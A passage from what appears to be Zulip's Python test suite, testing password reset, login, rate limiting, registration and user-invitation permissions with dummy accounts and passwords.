result = self.client_post(
final_reset_url, {"new_password1": "easy", "new_password2": "easy"}
)
self.assert_in_response("The password is too weak.", result)
result = self.client_post(
final_reset_url, {"new_password1": "f657gdGGk9", "new_password2": "f657gdGGk9"}
)
# password reset succeeded
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/password/done/"))
# log back in with new password
self.login_by_email(email, password="f657gdGGk9")
user_profile = self.example_user("hamlet")
self.assert_logged_in_user_id(user_profile.id)
# make sure old password no longer works
self.assert_login_failure(email, password=old_password)
def test_password_reset_for_non_existent_user(self) -> None:
email = "nonexisting@mars.com"
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("You do not have an account", body)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("deactivated", body)
def test_password_reset_for_deactivated_user(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
do_deactivate_user(user_profile, acting_user=None)
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("has been deactivated", body)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("not have an account", body)
def test_password_reset_with_deactivated_realm(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
do_deactivate_realm(user_profile.realm, acting_user=None)
# start the password reset process by supplying an email address
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(m.output, ["INFO:root:Realm is deactivated"])
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
        # No password reset email should be sent when the realm is deactivated.
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(RATE_LIMITING=True)
def test_rate_limiting(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
from django.core.mail import outbox
add_ratelimit_rule(10, 2, domain="password_reset_form_by_email")
start_time = time.time()
with patch("time.time", return_value=start_time):
self.client_post("/accounts/password/reset/", {"email": email})
self.client_post("/accounts/password/reset/", {"email": email})
self.assert_length(outbox, 2)
# Too many password reset emails sent to the address, we won't send more.
with self.assertLogs(level="INFO") as info_logs:
self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
info_logs.output,
["INFO:root:Too many password reset attempts for email hamlet@zulip.com"],
)
self.assert_length(outbox, 2)
# Resetting for a different address works though.
self.client_post("/accounts/password/reset/", {"email": self.example_email("othello")})
self.assert_length(outbox, 3)
self.client_post("/accounts/password/reset/", {"email": self.example_email("othello")})
self.assert_length(outbox, 4)
        # After time passes, password reset emails can be sent again.
with patch("time.time", return_value=start_time + 11):
self.client_post("/accounts/password/reset/", {"email": email})
self.client_post("/accounts/password/reset/", {"email": email})
self.assert_length(outbox, 6)
remove_ratelimit_rule(10, 2, domain="password_reset_form_by_email")
def test_wrong_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email}, subdomain="zephyr")
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
body = self.get_reset_mail_body("zephyr")
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("You do not have an account", body)
self.assertIn(
"active accounts in the following organization(s).\nhttp://zulip.testserver", body
)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("deactivated", body)
def test_invalid_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post(
"/accounts/password/reset/", {"email": email}, subdomain="invalid"
)
        # An invalid subdomain results in a 404 rather than the usual redirect.
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_auth_only(self) -> None:
"""If the email auth backend is not enabled, password reset should do nothing"""
email = self.example_email("hamlet")
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
m.output,
[
"INFO:root:Password reset attempted for hamlet@zulip.com even though password auth is disabled."
],
)
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
from django.core.mail import outbox
self.assert_length(outbox, 0)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_ldap_and_email_auth(self) -> None:
"""If both email and LDAP auth backends are enabled, limit password
reset to users outside the LDAP domain"""
# If the domain matches, we don't generate an email
with self.settings(LDAP_APPEND_DOMAIN="zulip.com"):
email = self.example_email("hamlet")
with self.assertLogs(level="INFO") as m:
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(
m.output, ["INFO:root:Password reset not allowed for user in LDAP domain"]
)
from django.core.mail import outbox
self.assert_length(outbox, 0)
# If the domain doesn't match, we do generate an email
with self.settings(LDAP_APPEND_DOMAIN="example.com"):
email = self.example_email("hamlet")
result = self.client_post("/accounts/password/reset/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
body = self.get_reset_mail_body()
self.assertIn("reset your password", body)
def test_redirect_endpoints(self) -> None:
"""
These tests are mostly designed to give us 100% URL coverage
in our URL coverage reports. Our mechanism for finding URL
coverage doesn't handle redirects, so we just have a few quick
tests here.
"""
result = self.client_get("/accounts/password/reset/done/")
self.assert_in_success_response(["Check your email"], result)
result = self.client_get("/accounts/password/done/")
self.assert_in_success_response(["We've reset your password!"], result)
result = self.client_get("/accounts/send_confirm/alice@example.com")
self.assert_in_success_response(["/accounts/home/"], result)
result = self.client_get("/accounts/new/send_confirm/alice@example.com")
self.assert_in_success_response(["/new/"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
def test_login(self) -> None:
self.login("hamlet")
user_profile = self.example_user("hamlet")
self.assert_logged_in_user_id(user_profile.id)
def test_login_deactivated_user(self) -> None:
user_profile = self.example_user("hamlet")
do_deactivate_user(user_profile, acting_user=None)
result = self.login_with_return(self.example_email("hamlet"), "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Your account is no longer active.", result)
self.assert_logged_in_user_id(None)
def test_login_bad_password(self) -> None:
user = self.example_user("hamlet")
password: Optional[str] = "wrongpassword"
result = self.login_with_return(user.delivery_email, password=password)
self.assert_in_success_response([user.delivery_email], result)
self.assert_logged_in_user_id(None)
# Parallel test to confirm that the right password works using the
# same login code, which verifies our failing test isn't broken
# for some other reason.
password = initial_password(user.delivery_email)
result = self.login_with_return(user.delivery_email, password=password)
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user.id)
@override_settings(RATE_LIMITING_AUTHENTICATE=True)
def test_login_bad_password_rate_limiter(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
add_ratelimit_rule(10, 2, domain="authenticate_by_username")
start_time = time.time()
with patch("time.time", return_value=start_time):
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
# We're over the allowed limit, so the next attempt, even with the correct
# password, will get blocked.
result = self.login_with_return(email)
self.assert_in_success_response(["Try again in 10 seconds"], result)
# After time passes, we should be able to log in.
with patch("time.time", return_value=start_time + 11):
self.login_with_return(email)
self.assert_logged_in_user_id(user_profile.id)
remove_ratelimit_rule(10, 2, domain="authenticate_by_username")
def test_login_with_old_weak_password_after_hasher_change(self) -> None:
user_profile = self.example_user("hamlet")
password = "a_password_of_22_chars"
with self.settings(PASSWORD_HASHERS=("django.contrib.auth.hashers.SHA1PasswordHasher",)):
user_profile.set_password(password)
user_profile.save()
with self.settings(
PASSWORD_HASHERS=(
"django.contrib.auth.hashers.MD5PasswordHasher",
"django.contrib.auth.hashers.SHA1PasswordHasher",
),
PASSWORD_MIN_LENGTH=30,
), self.assertLogs("zulip.auth.email", level="INFO"):
result = self.login_with_return(self.example_email("hamlet"), password)
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Your password has been disabled because it is too weak.", result
)
self.assert_logged_in_user_id(None)
def test_login_nonexist_user(self) -> None:
result = self.login_with_return("xxx@zulip.com", "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please enter a correct email and password", result)
self.assert_logged_in_user_id(None)
def test_login_wrong_subdomain(self) -> None:
with self.assertLogs(level="WARNING") as m:
result = self.login_with_return(self.mit_email("sipbtest"), "xxx")
self.assertEqual(
m.output,
[
"WARNING:root:User sipbtest@mit.edu attempted password login to wrong subdomain zulip"
],
)
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Your Zulip account is not a member of the "
"organization associated with this subdomain.",
result,
)
self.assert_logged_in_user_id(None)
def test_login_invalid_subdomain(self) -> None:
result = self.login_with_return(self.example_email("hamlet"), "xxx", subdomain="invalid")
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
self.assert_logged_in_user_id(None)
def test_register(self) -> None:
reset_emails_in_zulip_realm()
realm = get_realm("zulip")
stream_names = [f"stream_{i}" for i in range(40)]
for stream_name in stream_names:
stream = self.make_stream(stream_name, realm=realm)
DefaultStream.objects.create(stream=stream, realm=realm)
# Clear all the caches.
flush_per_request_caches()
ContentType.objects.clear_cache()
with queries_captured() as queries, cache_tries_captured() as cache_tries:
self.register(self.nonreg_email("test"), "test")
# Ensure the number of queries we make is not O(streams)
self.assert_length(queries, 88)
# We can probably avoid a couple cache hits here, but there doesn't
# seem to be any O(N) behavior. Some of the cache hits are related
# to sending messages, such as getting the welcome bot, looking up
# the alert words for a realm, etc.
self.assert_length(cache_tries, 20)
user_profile = self.nonreg_user("test")
self.assert_logged_in_user_id(user_profile.id)
self.assertFalse(user_profile.enable_stream_desktop_notifications)
def test_register_deactivated(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_post(
"/accounts/home/", {"email": self.nonreg_email("test")}, subdomain="zulip"
)
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user("test")
def test_register_with_invalid_email(self) -> None:
"""
If you try to register with invalid email, you get an invalid email
page
"""
invalid_email = "foo\x00bar"
result = self.client_post("/accounts/home/", {"email": invalid_email}, subdomain="zulip")
self.assertEqual(result.status_code, 200)
self.assertContains(result, "Enter a valid email address")
def test_register_deactivated_partway_through(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
email = self.nonreg_email("test")
result = self.client_post("/accounts/home/", {"email": email}, subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertNotIn("deactivated", result.url)
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user("test")
def test_login_deactivated_realm(self) -> None:
"""
If you try to log in to a deactivated realm, you get a clear error page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual("/accounts/deactivated/", result.url)
def test_logout(self) -> None:
self.login("hamlet")
# We use the logout API, not self.logout, to make sure we test
# the actual logout code path.
self.client_post("/accounts/logout/")
self.assert_logged_in_user_id(None)
def test_non_ascii_login(self) -> None:
"""
        You can log in even if your password contains non-ASCII characters.
"""
email = self.nonreg_email("test")
password = "hümbüǵ"
# Registering succeeds.
self.register(email, password)
user_profile = self.nonreg_user("test")
self.assert_logged_in_user_id(user_profile.id)
self.logout()
self.assert_logged_in_user_id(None)
# Logging in succeeds.
self.logout()
self.login_by_email(email, password)
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=False)
def test_login_page_redirects_logged_in_user(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
self.login("cordelia")
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_options_request_to_login_page(self) -> None:
response = self.client_options("/login/")
self.assertEqual(response.status_code, 200)
@override_settings(TWO_FACTOR_AUTHENTICATION_ENABLED=True)
def test_login_page_redirects_logged_in_user_under_2fa(self) -> None:
"""You will be redirected to the app's main page if you land on the
login page when already logged in.
"""
user_profile = self.example_user("cordelia")
self.create_default_device(user_profile)
self.login("cordelia")
self.login_2fa(user_profile)
response = self.client_get("/login/")
self.assertEqual(response["Location"], "http://zulip.testserver")
def test_start_two_factor_auth(self) -> None:
request = MagicMock(POST={})
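        # Stub out TwoFactorLoginView so that start_two_factor_auth just
        # returns a plain HttpResponse.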
with patch("zerver.views.auth.TwoFactorLoginView") as mock_view:
mock_view.as_view.return_value = lambda *a, **k: HttpResponse()
response = start_two_factor_auth(request)
self.assertTrue(isinstance(response, HttpResponse))
def test_do_two_factor_login(self) -> None:
user_profile = self.example_user("hamlet")
self.create_default_device(user_profile)
request = MagicMock()
with patch("zerver.decorator.django_otp.login") as mock_login:
do_two_factor_login(request, user_profile)
mock_login.assert_called_once()
def test_zulip_default_context_does_not_load_inline_previews(self) -> None:
realm = get_realm("zulip")
description = "https://www.google.com/images/srpr/logo4w.png"
realm.description = description
realm.save(update_fields=["description"])
response = self.client_get("/login/")
expected_response = """<p><a href="https://www.google.com/images/srpr/logo4w.png">\
https://www.google.com/images/srpr/logo4w.png</a></p>"""
self.assertEqual(response.context_data["realm_description"], expected_response)
self.assertEqual(response.status_code, 200)
class InviteUserBase(ZulipTestCase):
def check_sent_emails(self, correct_recipients: List[str]) -> None:
from django.core.mail import outbox
self.assert_length(outbox, len(correct_recipients))
email_recipients = [email.recipients()[0] for email in outbox]
self.assertEqual(sorted(email_recipients), sorted(correct_recipients))
if len(outbox) == 0:
return
self.assertIn("Zulip", self.email_display_from(outbox[0]))
self.assertEqual(self.email_envelope_from(outbox[0]), settings.NOREPLY_EMAIL_ADDRESS)
self.assertRegex(
self.email_display_from(outbox[0]), fr" <{self.TOKENIZED_NOREPLY_REGEX}>\Z"
)
self.assertEqual(outbox[0].extra_headers["List-Id"], "Zulip Dev <zulip.testserver>")
def invite(
self,
invitee_emails: str,
stream_names: Sequence[str],
body: str = "",
invite_as: int = PreregistrationUser.INVITE_AS["MEMBER"],
) -> HttpResponse:
"""
Invites the specified users to Zulip with the specified streams.
        invitee_emails should be a string of email addresses to invite,
        comma or newline separated; stream_names should be a list of
        stream name strings.
"""
stream_ids = []
for stream_name in stream_names:
stream_ids.append(self.get_stream_id(stream_name))
return self.client_post(
"/json/invites",
{
"invitee_emails": invitee_emails,
"stream_ids": orjson.dumps(stream_ids).decode(),
"invite_as": invite_as,
},
)
class InviteUserTest(InviteUserBase):
def test_successful_invite_user(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
invitee = "alice-test@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.check_sent_emails([invitee])
def test_newbie_restrictions(self) -> None:
user_profile = self.example_user("hamlet")
invitee = "alice-test@zulip.com"
stream_name = "Denmark"
self.login_user(user_profile)
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
user_profile.date_joined = timezone_now() - datetime.timedelta(days=10)
user_profile.save()
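        # A 10-day-old account satisfies a 5-day minimum age, but not a
        # 15-day one.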
with self.settings(INVITES_MIN_USER_AGE_DAYS=5):
result = self.invite(invitee, [stream_name])
self.assert_json_success(result)
with self.settings(INVITES_MIN_USER_AGE_DAYS=15):
result = self.invite(invitee, [stream_name])
self.assert_json_error_contains(result, "Your account is too new")
def test_invite_limits(self) -> None:
user_profile = self.example_user("hamlet")
realm = user_profile.realm
stream_name = "Denmark"
# These constants only need to be in descending order
# for this test to trigger an InvitationError based
# on max daily counts.
site_max = 50
realm_max = 40
num_invitees = 30
max_daily_count = 20
daily_counts = [(1, max_daily_count)]
invite_emails = [f"foo-{i:02}@zulip.com" for i in range(num_invitees)]
invitees = ",".join(invite_emails)
self.login_user(user_profile)
realm.max_invites = realm_max
realm.date_created = timezone_now()
realm.save()
def try_invite() -> HttpResponse:
with self.settings(
OPEN_REALM_CREATION=True,
INVITES_DEFAULT_REALM_DAILY_MAX=site_max,
INVITES_NEW_REALM_LIMIT_DAYS=daily_counts,
):
result = self.invite(invitees, [stream_name])
return result
result = try_invite()
self.assert_json_error_contains(result, "enough remaining invites")
# Next show that aggregate limits expire once the realm is old
# enough.
realm.date_created = timezone_now() - datetime.timedelta(days=8)
realm.save()
with queries_captured() as queries:
with cache_tries_captured() as cache_tries:
result = try_invite()
self.assert_json_success(result)
# TODO: Fix large query count here.
#
# TODO: There is some test OTHER than this one
# that is leaking some kind of state change
# that throws off the query count here. It
# is hard to investigate currently (due to
# the large number of queries), so I just
# use an approximate equality check.
actual_count = len(queries)
expected_count = 251
if abs(actual_count - expected_count) > 1:
raise AssertionError(
f"""
Unexpected number of queries:
expected query count: {expected_count}
actual: {actual_count}
"""
)
# Almost all of these cache hits are to re-fetch each one of the
# invitees. These happen inside our queue processor for sending
# confirmation emails, so they are somewhat difficult to avoid.
#
# TODO: Mock the call to queue_json_publish, so we can measure the
# queue impact separately from the user-perceived impact.
self.assert_length(cache_tries, 32)
# Next get line coverage on bumping a realm's max_invites.
realm.date_created = timezone_now()
realm.max_invites = site_max + 10
realm.save()
result = try_invite()
self.assert_json_success(result)
# Finally get coverage on the case that OPEN_REALM_CREATION is False.
with self.settings(OPEN_REALM_CREATION=False):
result = self.invite(invitees, [stream_name])
self.assert_json_success(result)
def test_invite_user_to_realm_on_manual_license_plan(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
_, ledger = self.subscribe_realm_to_monthly_plan_on_manual_license_management(
user.realm, 50, 50
)
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("alice"), ["Denmark"])
self.assert_json_success(result)
ledger.licenses_at_next_renewal = 5
ledger.save(update_fields=["licenses_at_next_renewal"])
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("bob"), ["Denmark"])
self.assert_json_success(result)
ledger.licenses = get_latest_seat_count(user.realm) + 1
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
invitee_emails = self.nonreg_email("bob") + "," + self.nonreg_email("alice")
result = self.invite(invitee_emails, ["Denmark"])
self.assert_json_error_contains(
result, "Your organization does not have enough unused Zulip licenses to invite 2 users"
)
ledger.licenses = get_latest_seat_count(user.realm)
ledger.save(update_fields=["licenses"])
with self.settings(BILLING_ENABLED=True):
result = self.invite(self.nonreg_email("bob"), ["Denmark"])
self.assert_json_error_contains(
result, "All Zulip licenses for this organization are currently in use"
)
def test_cross_realm_bot(self) -> None:
inviter = self.example_user("hamlet")
self.login_user(inviter)
cross_realm_bot_email = "emailgateway@zulip.com"
legit_new_email = "fred@zulip.com"
invitee_emails = ",".join([cross_realm_bot_email, legit_new_email])
result = self.invite(invitee_emails, ["Denmark"])
self.assert_json_error(
result,
"Some of those addresses are already using Zulip,"
+ " so we didn't send them an invitation."
+ " We did send invitations to everyone else!",
)
def test_invite_mirror_dummy_user(self) -> None:
"""
A mirror dummy account is a temporary account
that we keep in our system if we are mirroring
data from something like Zephyr or IRC.
        We want such users to eventually sign up or
        register for Zulip, at which point we fully
        "activate" the account.
Here we test that you can invite a person who
has a mirror dummy account.
"""
inviter = self.example_user("hamlet")
self.login_user(inviter)
mirror_user = self.example_user("cordelia")
mirror_user.is_mirror_dummy = True
mirror_user.save()
change_user_is_active(mirror_user, False)
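        # The mirror dummy user starts with no PreregistrationUser rows,
        # just like a fresh invitee.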
self.assertEqual(
PreregistrationUser.objects.filter(email=mirror_user.email).count(),
0,
)
result = self.invite(mirror_user.email, ["Denmark"])
self.assert_json_success(result)
prereg_user = PreregistrationUser.objects.get(email=mirror_user.email)
self.assertEqual(
prereg_user.referred_by.email,
inviter.email,
)
def test_successful_invite_user_as_owner_from_owner_account(self) -> None:
self.login("desdemona")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertTrue(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_owner_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
self.assert_json_error(response, "Must be an organization owner")
def test_successful_invite_user_as_admin_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_ADMIN"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertTrue(invitee_profile.is_realm_admin)
self.assertFalse(invitee_profile.is_realm_owner)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_admin_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_ADMIN"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_successful_invite_user_as_moderator_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
result = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_success(result)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_moderator)
self.assertFalse(invitee_profile.is_guest)
def test_invite_user_as_moderator_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_invite_user_as_moderator_from_moderator_account(self) -> None:
self.login("shiva")
invitee = self.nonreg_email("alice")
response = self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["MODERATOR"]
)
self.assert_json_error(response, "Must be an organization administrator")
def test_invite_user_as_invalid_type(self) -> None:
"""
        Test inviting a user with an invalid type, i.e. an invite_as
        value that is not in PreregistrationUser.INVITE_AS.
"""
self.login("iago")
invitee = self.nonreg_email("alice")
response = self.invite(invitee, ["Denmark"], invite_as=10)
self.assert_json_error(response, "Must be invited as an valid type of user")
def test_successful_invite_user_as_guest_from_normal_account(self) -> None:
self.login("hamlet")
invitee = self.nonreg_email("alice")
self.assert_json_success(
self.invite(invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["GUEST_USER"])
)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_as_guest_from_admin_account(self) -> None:
self.login("iago")
invitee = self.nonreg_email("alice")
self.assert_json_success(
self.invite(invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["GUEST_USER"])
)
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
self.assertFalse(invitee_profile.is_realm_admin)
self.assertTrue(invitee_profile.is_guest)
def test_successful_invite_user_with_name(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
email = "alice-test@zulip.com"
invitee = f"Alice Test <{email}>"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.check_sent_emails([email])
def test_successful_invite_user_with_name_and_normal_one(self) -> None:
"""
A call to /json/invites with valid parameters causes an invitation
email to be sent.
"""
self.login("hamlet")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_can_invite_others_to_realm(self) -> None:
def validation_func(user_profile: UserProfile) -> bool:
user_profile.refresh_from_db()
return user_profile.can_invite_others_to_realm()
self.check_has_permission_policies("invite_to_realm_policy", validation_func)
def test_invite_others_to_realm_setting(self) -> None:
"""
The invite_to_realm_policy realm setting works properly.
"""
realm = get_realm("zulip")
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_ADMINS_ONLY, acting_user=None
)
self.login("shiva")
email = "alice-test@zulip.com"
email2 = "bob-test@zulip.com"
invitee = f"Alice Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
# Now verify an administrator can do it
self.login("iago")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
from django.core import mail
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_MODERATORS_ONLY, acting_user=None
)
self.login("hamlet")
email = "carol-test@zulip.com"
email2 = "earl-test@zulip.com"
invitee = f"Carol Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
self.login("shiva")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_MEMBERS_ONLY, acting_user=None
)
self.login("polonius")
email = "dave-test@zulip.com"
email2 = "mark-test@zulip.com"
invitee = f"Dave Test <{email}>, {email2}"
self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
self.login("hamlet")
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
mail.outbox = []
do_set_realm_property(
realm, "invite_to_realm_policy", Realm.POLICY_FULL_MEMBERS_ONLY, acting_user=None
)
do_set_realm_property(realm, "waiting_period_threshold", 1000, acting_user=None)
hamlet = self.example_user("hamlet")
        hamlet.date_joined = timezone_now() - datetime.timedelta(
            days=(realm.waiting_period_threshold - 1)
        )
        hamlet.save(update_fields=["date_joined"])
email = "issac-test@zulip.com"
email2 = "steven-test@zulip.com"
invitee = f"Issac Test <{email}>, {email2}"
self.assert_json_error(
self.invite(invitee, ["Denmark"]),
"Insufficient permission",
)
do_set_realm_property(realm, "waiting_period_threshold", 0, acting_user=None)
self.assert_json_success(self.invite(invitee, ["Denmark"]))
self.assertTrue(find_key_by_email(email))
self.assertTrue(find_key_by_email(email2))
self.check_sent_emails([email, email2])
def test_invite_user_signup_initial_history(self) -> None:
"""
Test that a new user invited to a stream receives some initial
history but only from public streams.
"""
self.login("hamlet")
user_profile = self.example_user("hamlet")
private_stream_name = "Secret"
self.make_stream(private_stream_name, invite_only=True)
self.subscribe(user_profile, private_stream_name)
public_msg_id = self.send_stream_message(
self.example_user("hamlet"),
"Denmark",
topic_name="Public topic",
content="Public message",
)
secret_msg_id = self.send_stream_message(
self.example_user("hamlet"),
private_stream_name,
topic_name="Secret topic",
content="Secret message",
)
invitee = self.nonreg_email("alice")
self.assert_json_success(self.invite(invitee, [private_stream_name, "Denmark"]))
self.assertTrue(find_key_by_email(invitee))
self.submit_reg_form_for_user(invitee, "password")
invitee_profile = self.nonreg_user("alice")
invitee_msg_ids = [
um.message_id for um in UserMessage.objects.filter(user_profile=invitee_profile)
]
self.assertTrue(public_msg_id in invitee_msg_ids)
self.assertFalse(secret_msg_id in invitee_msg_ids)
self.assertFalse(invitee_profile.is_realm_admin)
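        # The four most recent messages should be: welcome-bot's greeting to
        # the invitee, the signups stream notification, the notification to
        # the inviter, and the secret message sent earlier.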
